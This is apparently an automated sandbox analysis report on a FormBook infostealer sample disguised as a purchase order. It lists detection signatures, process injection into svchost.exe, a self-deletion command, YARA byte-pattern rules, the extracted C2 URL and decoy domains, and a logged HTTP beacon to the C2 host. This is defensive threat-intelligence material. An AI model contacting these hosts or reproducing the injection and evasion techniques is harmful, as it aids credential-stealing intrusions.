Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO_101&102.exe

Overview

General Information

Sample Name:PO_101&102.exe
Analysis ID:510600
MD5:c8a5346cb632c91e0006252fd2c47bec
SHA1:a671570c31428ebc9bee30c9a2b9963bf629560a
SHA256:46a0a8595dccf134213c2e9ae10dd6fdd8e3ff5f0cb1b01014a6b67e31927eec
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64
  • PO_101&102.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\PO_101&102.exe' MD5: C8A5346CB632C91E0006252FD2C47BEC)
    • PO_101&102.exe (PID: 5268 cmdline: {path} MD5: C8A5346CB632C91E0006252FD2C47BEC)
    • PO_101&102.exe (PID: 5964 cmdline: {path} MD5: C8A5346CB632C91E0006252FD2C47BEC)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 5580 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6216 cmdline: /c del 'C:\Users\user\Desktop\PO_101&102.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.reynbetgirisi.com/snr6/"], "decoy": ["jjglassmi1.com", "vpsseattle.com", "drfllc.top", "staycoolonline.com", "eptlove.com", "solusimatasehat.site", "ionrarecharlestonproperties.com", "b3eflucg.xyz", "tvchosun-usa.com", "mmahzxwzsadqlshop.life", "gospelimport.com", "demoapps.website", "jackburst54.com", "99rocket.education", "ccbwithbri.com", "trapperairsoft.com", "useroadly.com", "ralphlaurenonline-nl.com", "loanmaster4u.com", "champ-beauty-tomigaoka-nail.com", "theripemillennial.com", "123intan.net", "typopendant.com", "coruscant.holdings", "bio-intelligenz-therapie.com", "reprv.com", "directreport.net", "phinespe.xyz", "xuvedae.site", "idilikproperties.info", "wakigaggenin.com", "mal2tech.com", "nftwhaler.xyz", "gxhnjssx.com", "ozba.xyz", "lecupcake.net", "lucid.quest", "kaleoslawncare.com", "tiew.store", "texcommercialpainting.com", "2152351.com", "likewize-xl.com", "dacooligans.com", "manuelmartinezs.com", "beancusp.com", "barbershopvalleyvillage.com", "southwickfunerals.com", "briellebaeslay.info", "rebeccarye.com", "unitedstateswelders.com", "saudiarabiavegan.com", "testcarona.com", "serverapsd.com", "crickx.email", "hdszbj.com", "bennettmountainoutfitter.com", "leileilei1999.xyz", "baroquefolke.com", "francinegeorges.com", "horpces.online", "resolutionfix.com", "mike-schultz.xyz", "sohutobankueahomupezinkv.xyz", "flowerseedqueen.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.PO_101&102.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.PO_101&102.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.PO_101&102.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        10.0.PO_101&102.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.0.PO_101&102.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5580
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5580
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5580

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.reynbetgirisi.com/snr6/"], "decoy": ["jjglassmi1.com", "vpsseattle.com", "drfllc.top", "staycoolonline.com", "eptlove.com", "solusimatasehat.site", "ionrarecharlestonproperties.com", "b3eflucg.xyz", "tvchosun-usa.com", "mmahzxwzsadqlshop.life", "gospelimport.com", "demoapps.website", "jackburst54.com", "99rocket.education", "ccbwithbri.com", "trapperairsoft.com", "useroadly.com", "ralphlaurenonline-nl.com", "loanmaster4u.com", "champ-beauty-tomigaoka-nail.com", "theripemillennial.com", "123intan.net", "typopendant.com", "coruscant.holdings", "bio-intelligenz-therapie.com", "reprv.com", "directreport.net", "phinespe.xyz", "xuvedae.site", "idilikproperties.info", "wakigaggenin.com", "mal2tech.com", "nftwhaler.xyz", "gxhnjssx.com", "ozba.xyz", "lecupcake.net", "lucid.quest", "kaleoslawncare.com", "tiew.store", "texcommercialpainting.com", "2152351.com", "likewize-xl.com", "dacooligans.com", "manuelmartinezs.com", "beancusp.com", "barbershopvalleyvillage.com", "southwickfunerals.com", "briellebaeslay.info", "rebeccarye.com", "unitedstateswelders.com", "saudiarabiavegan.com", "testcarona.com", "serverapsd.com", "crickx.email", "hdszbj.com", "bennettmountainoutfitter.com", "leileilei1999.xyz", "baroquefolke.com", "francinegeorges.com", "horpces.online", "resolutionfix.com", "mike-schultz.xyz", "sohutobankueahomupezinkv.xyz", "flowerseedqueen.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO_101&102.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: https://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrFAvira URL Cloud: Label: malware
          Source: http://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTEAvira URL Cloud: Label: malware
          Source: www.reynbetgirisi.com/snr6/Avira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: PO_101&102.exeJoe Sandbox ML: detected
          Source: 10.0.PO_101&102.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.0.PO_101&102.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.PO_101&102.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.0.PO_101&102.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO_101&102.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO_101&102.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_101&102.exe, 0000000A.00000002.371692405.0000000001600000.00000040.00000001.sdmp, svchost.exe, 0000000F.00000002.559918506.0000000003700000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_101&102.exe, svchost.exe
          Source: Binary string: svchost.pdb source: PO_101&102.exe, 0000000A.00000002.371642195.00000000015B0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: PO_101&102.exe, 0000000A.00000002.371642195.00000000015B0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 185.178.208.163 80
          Source: C:\Windows\explorer.exeDomain query: www.reynbetgirisi.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.reynbetgirisi.com/snr6/
          Source: Joe Sandbox ViewASN Name: DDOS-GUARDRU DDOS-GUARDRU
          Source: global trafficHTTP traffic detected: GET /snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTE HTTP/1.1Host: www.reynbetgirisi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO_101&102.exe, 00000001.00000002.311135246.00000000033C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
          Source: PO_101&102.exeString found in binary or memory: http://tempuri.org/DatabaseDataSet.xsd
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PO_101&102.exe, 00000001.00000003.290680081.0000000006459000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers&
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com5
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO_101&102.exe, 00000001.00000003.285166630.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com-u
          Source: PO_101&102.exe, 00000001.00000003.285166630.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com-uI
          Source: PO_101&102.exe, 00000001.00000003.285275223.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
          Source: PO_101&102.exe, 00000001.00000003.287344198.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO_101&102.exe, 00000001.00000003.309471550.0000000006450000.00000004.00000001.sdmp, PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: PO_101&102.exe, 00000001.00000003.288893237.0000000006454000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/_
          Source: PO_101&102.exe, 00000001.00000003.285223985.0000000006474000.00000004.00000001.sdmp, PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO_101&102.exe, 00000001.00000003.286605823.0000000006456000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: PO_101&102.exe, 00000001.00000003.286605823.0000000006456000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krE
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO_101&102.exe, 00000001.00000003.285531786.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
          Source: PO_101&102.exe, 00000001.00000003.285505347.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
          Source: PO_101&102.exe, 00000001.00000003.286197487.000000000646B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comy
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO_101&102.exe, 00000001.00000002.316119891.0000000007662000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: svchost.exe, 0000000F.00000002.561711505.000000000411F000.00000004.00020000.sdmpString found in binary or memory: https://www.reynbetgirisi.com/snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF
          Source: unknownDNS traffic detected: queries for: www.reynbetgirisi.com
          Source: global trafficHTTP traffic detected: GET /snr6/?jDH8=E19JCPWLLAvTbcnEEa/roDJkoR1wzkcHqaxLe1hmnUekSrF+l+57NdrJs1Xds1ailiks&l0D0=fJBTE HTTP/1.1Host: www.reynbetgirisi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: PO_101&102.exe, 00000001.00000002.310356859.000000000175A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
